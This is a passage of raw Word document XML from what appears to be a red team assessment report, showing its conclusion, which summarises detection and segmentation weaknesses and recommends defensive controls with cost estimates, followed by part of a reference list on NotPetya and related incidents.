            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6C46C5E9" w14:textId="77777777" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00AF28EE" w:rsidP="00C60D92">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34C4EBFA" w14:textId="77777777" w:rsidR="00F0144F" w:rsidRDefault="00F0144F" w:rsidP="00C60D92">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="00204F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="_Toc215851848"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="722369B6" w14:textId="70D0FA3E" w:rsidR="00AF28EE" w:rsidRPr="00F0144F" w:rsidRDefault="00F0144F" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="_Toc216881410"/>
      <w:r w:rsidRPr="00F0144F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>VII.  Conclusion</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p w14:paraId="10C6170A" w14:textId="64E08C33" w:rsidR="00E311F9"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 xml:space="preserve">The Red Team operation made it clear that the hybrid setup of CPC could be attacked via normal APT-like methods, to expose the major weaknesses in detection, network segmentation, and endpoint monitoring. The attack path under control—from information gathering to data exfiltration—revealed that the lack of powerful logging, free outbound traffic, and poor credential protections enabled quiet movement through the systems. </w:t>
      </w:r>
      <w:r w:rsidR="00E311F9" w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The engagement revealed major risks that covered the on-premises, cloud, and CI/CD systems. The major risks are the occurrence of disruption in operations, theft of intellectual property, and the risk of the supply chain being compromised.  The financial impact that has been estimated is between £2.5 million and £5 million.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6EA50A" w14:textId="623ED83C" w:rsidR="00E311F9"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The recommended actions are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BE3246" w14:textId="1FFA6AC3" w:rsidR="00E311F9" w:rsidRPr="00B40682" w:rsidRDefault="00E311F9" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>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Zero Trust segmentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189B5F67" w14:textId="64DE8312" w:rsidR="00E311F9" w:rsidRPr="00B40682" w:rsidRDefault="00E311F9" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>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EDR with MITRE behavioural rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA7C032" w14:textId="47572746" w:rsidR="00E311F9" w:rsidRPr="00B40682" w:rsidRDefault="00E311F9" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>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Strong secrets management for CI/CD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43560E4C" w14:textId="758A8B2F" w:rsidR="00E311F9" w:rsidRPr="00B40682" w:rsidRDefault="00E311F9" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:num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Regular adversary emulation exercises</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539B64E0" w14:textId="576F583E" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00E311F9"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A security increase of £45,000 to £60,000 would greatly lower the risk faced by the organization.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B79C5A9" w14:textId="3E387E77" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00656352" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="_heading=h.gzj9uhasgmp" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="61" w:name="_Toc215851849"/>
      <w:bookmarkStart w:id="62" w:name="_Toc216881411"/>
      <w:bookmarkEnd w:id="60"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>REFERENCES</w:t>
      </w:r>
      <w:bookmarkEnd w:id="61"/>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:p w14:paraId="59A0A787" w14:textId="05BDAA17"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 CISA Cybersecurity and Infrastructure Security Agency 2017, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Petya Ransomware</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, CISA Alerts. Available at:  </w:t>
      </w:r>
      <w:hyperlink r:id="rId54">
        <w:r w:rsidR="00AF28EE" w:rsidRPr="00B40682">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://www.cisa.gov/news-events/alerts/2017/07/01/petya-ransomware</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E8E11C" w14:textId="4278E8ED"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[2] Cybersecurity and Infrastructure Security Agency CISA 2022, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Implementing Phishing-Resistant MFA. </w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Available at: </w:t>
      </w:r>
      <w:hyperlink r:id="rId55" w:history="1">
        <w:r w:rsidRPr="00B40682">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>https://www.cisa.gov/sites/default/files/2023-01/fact-sheet-implementing-phishing-resistant-mfa-508c.pdf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F10E556" w14:textId="74238599"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[3] </w:t>
      </w:r>
      <w:r w:rsidR="00445BC4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Falcon Intelligence Team CrowdStrike</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2017, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Fast-Spreading </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PETRWrap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ransomware Attack Combines </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Exploit and Credential Stealing</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. Available at: </w:t>
      </w:r>
      <w:hyperlink r:id="rId56">
        <w:r w:rsidR="00AF28EE" w:rsidRPr="00B40682">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://www.crowdstrike.com/en-us/blog/fast-spreading-petrwrap-ransomware-attack-combines-eternalblue-exploit-credential-stealing/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263AEFE2" w14:textId="506F6D9E"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[4] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Demberger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, A 2022, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Merck Awarded $1.4 Billion for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NotPetya</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> After 5 Years of Legal Battle</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>. Available at:</w:t>
      </w:r>
      <w:hyperlink r:id="rId57">
        <w:r w:rsidR="00AF28EE" w:rsidRPr="00B40682">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://riskandinsurance.com/merck-awarded-1-4-billion-for-notpetya-after-5-years-of-legal-battle/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D23E9BD" w14:textId="2E0097E7" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="007E57E5" w:rsidP="00C60D92">
      <w:pPr>
        <w:spacing w:before="240" w:after="240" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[5] Elastic 2025, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Cron Job Created or Modified (Elastic Security 8.19) — Documentation</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. Available at: </w:t>
      </w:r>
      <w:hyperlink r:id="rId58">
        <w:r w:rsidR="00AF28EE" w:rsidRPr="00B40682">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId59" w:history="1">
        <w:r w:rsidRPr="00B40682">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/security/8.19/cron-job-created-or-modified.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CACEE1" w14:textId="1E82FA15"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[6] Erman, M and Finkle, J 2017, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Merck says </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cyber attack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> halted production, will hurt profits</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>. Available at:</w:t>
      </w:r>
      <w:hyperlink r:id="rId60">
        <w:r w:rsidR="00AF28EE" w:rsidRPr="00B40682">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://www.reuters.com/article/business/merck-says-cyber-attack-halted-production-will-hurt-profits-idUSKBN1AD1AO/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799E1033" w14:textId="778986A4"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[7] Greenberg, A 2018, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The Untold Story of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NotPetya</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, the Most Devastating Cyber Attack in History</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. Available at:  </w:t>
      </w:r>
      <w:hyperlink r:id="rId61" w:history="1">
        <w:r w:rsidRPr="00B40682">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>https://www.wired.com/story/notpetya-cyberattack-ukraine-russia-code-crashed-the-world/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE05C27" w14:textId="38FE1878"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[8] Merck and Co., Inc. 2019, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Form 10-K for the fiscal year ended December 31, 2018</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, United States Securities and Exchange Commission. Available at:  </w:t>
      </w:r>
      <w:hyperlink r:id="rId62">
        <w:r w:rsidR="00AF28EE" w:rsidRPr="00B40682">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>www.sec.gov/Archives/edgar/data/310158/000031015819000014/mrk1231201810k.htm</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3C261A" w14:textId="5874E3ED"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[9] Microsoft Threat Intelligence 2023, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Volt Typhoon targets US critical infrastructure with living-off-the-land techniques</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, Microsoft. Available at: </w:t>
      </w:r>
      <w:hyperlink r:id="rId63">
        <w:r w:rsidR="00AF28EE" w:rsidRPr="00B40682">
          <w:rPr>
